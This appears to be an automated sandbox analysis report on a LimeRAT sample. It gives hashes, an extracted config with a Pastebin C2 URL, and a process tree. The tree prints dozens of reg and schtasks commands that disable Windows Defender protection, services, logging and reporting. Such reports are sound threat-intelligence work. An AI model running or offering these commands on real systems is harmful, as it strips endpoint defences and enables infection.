Analysis
-
max time kernel
5s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 13:43
Static task
static1
Behavioral task
behavioral1
Sample
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
Resource
win7-20220414-en
General
-
Target
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
-
Size
621KB
-
MD5
d41a2901bf1d0f3ba6b9498d6542c437
-
SHA1
cbbb9798a8bec4aa787cb4de24e07bcbe4a16983
-
SHA256
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
-
SHA512
231d6a471c8d41d7fbcaf4278af36bfb8495a57327210ef71d9be98a80ba7ec312dc92c1a75448df63a5362917bf35814e4e32c10ef2f3b33536b408d6f7e504
Malware Config
Extracted
limerat
1PPgmaXrzTj4ZXMTWNLh6VcmKRgU817rdK
-
aes_key
nyancat
-
antivm
false
-
c2_url
https://pastebin.com/raw/FvCAV8it
-
delay
3
-
download_payload
false
-
install
false
-
install_name
Wservices.exe
-
main_folder
Temp
-
pin_spread
true
-
sub_folder
\
-
usb_spread
true
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"1⤵PID:3472
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"2⤵PID:4912
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"3⤵PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "2⤵PID:232
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f1⤵PID:4224
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f1⤵PID:2172
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable1⤵PID:4516
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable1⤵PID:3772
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f1⤵PID:4712
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exePayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp1⤵PID:392
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"2⤵PID:2952
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:324
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:736
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:2584
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f1⤵PID:4164
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f1⤵PID:2352
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f1⤵PID:4392
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f1⤵PID:776
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable1⤵PID:4968
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable1⤵PID:1672
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable1⤵PID:5104
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f1⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f1⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f1⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f1⤵PID:552
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f1⤵PID:2164
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f1⤵PID:4012
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f1⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f1⤵PID:3592
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f1⤵PID:4260
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f1⤵PID:4276
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f1⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f1⤵PID:3404
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f1⤵PID:1268
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58760b15c6d12ecc70594fc8db876c68c
SHA1b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA2569a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA5120463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee
-
Filesize
362KB
MD59f150fdb9779485a9b4af5875a48aaf7
SHA147e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df
-
Filesize
362KB
MD59f150fdb9779485a9b4af5875a48aaf7
SHA147e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df
-
Filesize
91KB
MD5086890d750b486ec89ca6e7edd4f2d7c
SHA15f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA2563d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA51233d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf
-
Filesize
91KB
MD5086890d750b486ec89ca6e7edd4f2d7c
SHA15f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA2563d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA51233d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf
-
Filesize
27B
MD576b34b8a915e15e32871820b24a60556
SHA1aabf1487a5dc1880d5c8a6979666b215dc09a837
SHA256ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1
SHA5122c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb
-
Filesize
82KB
MD554a1574cacf95b6c5c9c597d8d76de45
SHA14879d75f50d747a400c03ab9700e816ec0607fe6
SHA25667f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f
-
Filesize
82KB
MD554a1574cacf95b6c5c9c597d8d76de45
SHA14879d75f50d747a400c03ab9700e816ec0607fe6
SHA25667f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f